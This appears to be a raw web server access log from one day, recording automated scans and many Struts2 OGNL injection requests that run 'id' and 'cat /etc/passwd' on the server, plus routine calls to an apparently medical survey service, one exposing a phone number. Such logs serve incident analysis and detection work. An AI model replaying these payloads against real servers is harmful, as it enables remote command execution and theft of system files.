0:0:0:0:0:0:0:1 - - [26/Feb/2024:00:08:24 -0500] "GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 200 53385
0:0:0:0:0:0:0:1 - - [26/Feb/2024:00:08:24 -0500] "GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:00:08:24 -0500] "GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:00:08:24 -0500] "GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:00:08:24 -0500] "GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 200 53385
0:0:0:0:0:0:0:1 - - [26/Feb/2024:00:08:24 -0500] "GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 200 53385
0:0:0:0:0:0:0:1 - - [26/Feb/2024:00:08:24 -0500] "GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:00:08:24 -0500] "GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:00:08:24 -0500] "GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:01:55:19 -0500] "HEAD /wordpress HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:01:55:20 -0500] "HEAD /login HTTP/1.1" 405 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:01:55:20 -0500] "HEAD / HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:01:55:20 -0500] "HEAD /login HTTP/1.1" 405 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:01:55:20 -0500] "HEAD /wp HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:01:55:20 -0500] "HEAD /login HTTP/1.1" 405 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:01:55:20 -0500] "HEAD /bc HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:01:55:20 -0500] "HEAD /login HTTP/1.1" 405 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:01:55:21 -0500] "HEAD /bk HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:01:55:21 -0500] "HEAD /login HTTP/1.1" 405 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:01:55:21 -0500] "HEAD /backup HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:01:55:21 -0500] "HEAD /login HTTP/1.1" 405 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:01:55:21 -0500] "HEAD /old HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:01:55:21 -0500] "HEAD /login HTTP/1.1" 405 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:01:55:21 -0500] "HEAD /new HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:01:55:21 -0500] "HEAD /login HTTP/1.1" 405 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:01:55:22 -0500] "HEAD /main HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:01:55:22 -0500] "HEAD /login HTTP/1.1" 405 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:01:55:22 -0500] "HEAD /home HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:01:55:22 -0500] "HEAD /login HTTP/1.1" 405 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:04:39:07 -0500] "POST /CRQA/PMSGenericTextFlow?PhoneNumber=7347090892&Message=TMCWEB HTTP/1.1" 200 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:05:35:29 -0500] "GET /___proxy_subdomain_webdisk/ HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:05:36:01 -0500] "GET /login HTTP/1.1" 200 53385
0:0:0:0:0:0:0:1 - - [26/Feb/2024:05:41:06 -0500] "GET /___proxy_subdomain_cpanel/ HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:08:21:42 -0500] "POST /CRQA/getTotalCountWs HTTP/1.1" 200 676
0:0:0:0:0:0:0:1 - - [26/Feb/2024:08:21:45 -0500] "GET /CRQA/getStatesWs HTTP/1.1" 200 3488
0:0:0:0:0:0:0:1 - - [26/Feb/2024:08:37:43 -0500] "HEAD /wordpress HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:08:37:43 -0500] "HEAD /login HTTP/1.1" 405 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:08:37:43 -0500] "HEAD / HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:08:37:43 -0500] "HEAD /login HTTP/1.1" 405 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:08:37:44 -0500] "HEAD /wp HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:08:37:44 -0500] "HEAD /login HTTP/1.1" 405 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:08:37:44 -0500] "HEAD /bc HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:08:37:44 -0500] "HEAD /login HTTP/1.1" 405 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:08:37:44 -0500] "HEAD /bk HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:08:37:44 -0500] "HEAD /login HTTP/1.1" 405 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:08:37:44 -0500] "HEAD /backup HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:08:37:44 -0500] "HEAD /login HTTP/1.1" 405 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:08:37:45 -0500] "HEAD /old HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:08:37:45 -0500] "HEAD /login HTTP/1.1" 405 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:08:37:45 -0500] "HEAD /new HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:08:37:45 -0500] "HEAD /login HTTP/1.1" 405 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:08:37:45 -0500] "HEAD /main HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:08:37:45 -0500] "HEAD /login HTTP/1.1" 405 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:08:37:45 -0500] "HEAD /home HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:08:37:46 -0500] "HEAD /login HTTP/1.1" 405 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:09:06:39 -0500] "POST /CRQA/surveyNotificationWs HTTP/1.1" 200 103
0:0:0:0:0:0:0:1 - - [26/Feb/2024:09:27:25 -0500] "POST /CRQA/getTotalCountWs HTTP/1.1" 200 676
0:0:0:0:0:0:0:1 - - [26/Feb/2024:09:27:26 -0500] "GET /CRQA/getStatesWs HTTP/1.1" 200 3488
0:0:0:0:0:0:0:1 - - [26/Feb/2024:09:27:45 -0500] "POST /CRQA/getPatientActivityHistoryByDateWs HTTP/1.1" 200 151
0:0:0:0:0:0:0:1 - - [26/Feb/2024:09:40:11 -0500] "POST /CRQA/PMSGenericTextFlow?PhoneNumber=7347090892&Message=TMCWEB HTTP/1.1" 200 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:10:03:33 -0500] "POST /CRQA/PMSGenericTextFlow?PhoneNumber=7347090892&Message=TMCWEB HTTP/1.1" 200 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:11:26:07 -0500] "POST /CRQA/PMSGenericTextFlow?PhoneNumber=7347090892&Message=TMCWEB HTTP/1.1" 200 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:11:39:36 -0500] "POST /CRQA/PMSGenericTextFlow?PhoneNumber=7347090892&Message=TMCWEB HTTP/1.1" 200 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:22:27:34 -0500] "GET / HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:22:27:34 -0500] "GET /login HTTP/1.1" 200 53385
0:0:0:0:0:0:0:1 - - [26/Feb/2024:22:50:15 -0500] "GET /robots.txt HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:22:50:15 -0500] "GET /login HTTP/1.1" 200 53385
0:0:0:0:0:0:0:1 - - [26/Feb/2024:22:50:15 -0500] "GET /favicon.ico HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:22:50:15 -0500] "GET /login HTTP/1.1" 200 53385
0:0:0:0:0:0:0:1 - - [26/Feb/2024:23:42:14 -0500] "GET /portal/displayAPSForm.action?debug=command&expression=9247*5220 HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:23:42:14 -0500] "GET /?id=Ll3I8x%25{128*128} HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:23:42:42 -0500] "GET / HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:23:46:48 -0500] "GET /$%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D=true,%23a=@java.lang.Runtime@getRuntime().exec('cat%20/etc/passwd').getInputStream(),%23b=new%20java.io.InputStreamReader(%23a),%23c=new%20%20java.io.BufferedReader(%23b),%23d=new%20char%5B51020%5D,%23c.read(%23d),%23sbtest=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23sbtest.println(%23d),%23sbtest.close())%7D/actionChain1.action HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:23:48:46 -0500] "POST /integration/saveGangster.action HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:23:48:46 -0500] "POST /login.action HTTP/1.1" 200 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:23:48:47 -0500] "POST /user.action HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:23:48:47 -0500] "GET /index.action?redirect:http://www.interact.sh/ HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:23:50:01 -0500] "POST / HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:23:50:02 -0500] "POST / HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:23:51:22 -0500] "GET /devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream())) HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:23:51:23 -0500] "GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:23:53:40 -0500] "GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:23:56:47 -0500] "POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [26/Feb/2024:23:56:48 -0500] "GET / HTTP/1.1" 302 -